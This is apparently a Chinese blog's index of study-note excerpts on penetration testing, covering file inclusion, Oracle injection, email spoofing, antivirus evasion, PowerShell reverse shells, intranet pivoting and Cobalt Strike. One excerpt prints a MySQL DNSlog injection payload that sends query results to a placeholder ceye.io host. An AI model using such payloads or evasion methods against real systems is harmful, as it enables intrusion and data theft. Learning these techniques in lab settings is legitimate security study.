随笔分类 - 学习总结
摘要:一、前言 原来做 ctf 端茶倒水选手的时候伪协议就只熟悉常用的几个,最近在网上浏览技术文章发现伪协议的有些用法我还不知道,现在就结合文件包含学习、总结、整理一下叭。 二、文件包含 2.1文件包含理解 向上文件包含:先包含某个文件再写代码,目的是包含公用的代码文件,提高代码重用性 向下文件包含:先写
阅读全文
摘要:在 docker 搭建环境,尽量全面的实践一下 oracle 注入漏洞(碎碎念:最近觉得有些迷茫,有些事情真的是命运的安排啊,既然暂时不知道该怎么办就好好努力叭)对了,这里只记录对我个人理解很有帮助的地方和我印象比较深的特性,其他更细节的内容可以参考官方文档 https://docs.oracle.
阅读全文
摘要:一、前言 在写上篇 https://www.cnblogs.com/wkzb/p/15401932.html 随笔的时候,留了一个坑说要再写一篇随笔实操任意邮件伪造的方式。然而在最近的实验中,我发现很多文章提到的方式都已经无法复现了,达到最好的效果是可以成功伪造发件人,但是会有一个括号标记由哪个域名
阅读全文
摘要:1.1前提 最开始从其他师傅那里见到这个漏洞,参照一些师傅的博客学习了一下SPF记录的相关安全问题,今天来聊聊吧,首先要介绍一个协议和两个记录。 SMTP协议是简单的邮件传输协议,目前邮件还是使用这个协议通信,但是它本身并没有很好的安全措施。SMTP协议本身没有机制鉴别寄件人的真正身份,电子邮件的“
阅读全文
摘要:这篇长期更,陆续记录我新学习的 burp 小技巧 一、爆破特殊密码 这里以 tomcat 为例,Authorization 字段是做身份认证的,解码即可获取用户认证信息明文 burp 的 Intruder 模块可以实现很多复杂密码的爆破,知道了密码格式之后,Intruder->Payloads->P
阅读全文
摘要:公众号看到一篇文章《一次渗透妹子电脑开摄像头全过程》,有点好玩但是现在已经删了hhhh,想试一下这个免杀工具和捆绑方式。 一、Phantom-Evasion工具安装 下载地址:https://github.com/oddcod3/Phantom-Evasion 在 kali 下载源码后 pip3 i
阅读全文
摘要:在做一个小项目的过程中用到了 powershell 反弹 shell 到 msf,在本地和靶机分别做了几次实验,记录下来 payload 一、msfvenom生成ps1木马 msf 生成 ps1,传到目标再远程执行,但是 ps1 不能在 cmd 下执行,查资料了解到 cmd 执行如下命令可以将 po
阅读全文
摘要:这篇长期更,陆续记录我新学习的内网小技巧 一、iox工具的使用 最近在做一个内网渗透相关的小项目,内网很多操作还不熟,正好晚上大佬在实验室就请教了一波,lsyyyds! 没有图,我尽量详细的描述一下这个过程吧。 我现在的状况是 vps 的 msf 上添加了路由,挂了 socks4a 的代理,prox
阅读全文
摘要:一、原理 攻击者向 mysql 数据库提交注入语句 ?id=1' and if((select load_file(concat('\\\\',(攻击代码),'.xxxxxx.ceye.io\\abc'))),1,0)--+ if(x,1,0) 如果x为真,则输出1,假则输出0 load_file(
阅读全文
摘要:ngrok 的使用方法在我这篇博客的3.3小节记录过 https://www.cnblogs.com/wkzb/p/12358076.html#autoid-3-2-0 这篇文章的使用情景是攻击机在内网中,而靶机有公网ip(换句话说就是 kali 可以 ping 通靶机,靶机无法 ping 通 ka
阅读全文
摘要:一、啰嗦一下 想学 cs 是因为在写这篇 https://www.cnblogs.com/wkzb/p/12358076.html 靶机渗透的博客时,看大佬们的 wp 很多人是用 cs 做的。 系统学习的话内容还是很多的,就从这次靶机渗透开始,记录一下目前用到的模块,下面每个小节的服务端与客户端 i
阅读全文
摘要:今天请教了一下韩学长这个问题,记录一下 问题原因可能是: 1.服务器禁用了命令执行函数 2.服务器取消了命令回显 3.如果浏览器可以执行并且有结果回显,可能是服务端检测到了蚁剑的特征并拦截 4.请求超时,将时间设置到最大即可 先在浏览器测试了一下,发现可以成功回显。 再用蚁剑配合dnslog实验一下
阅读全文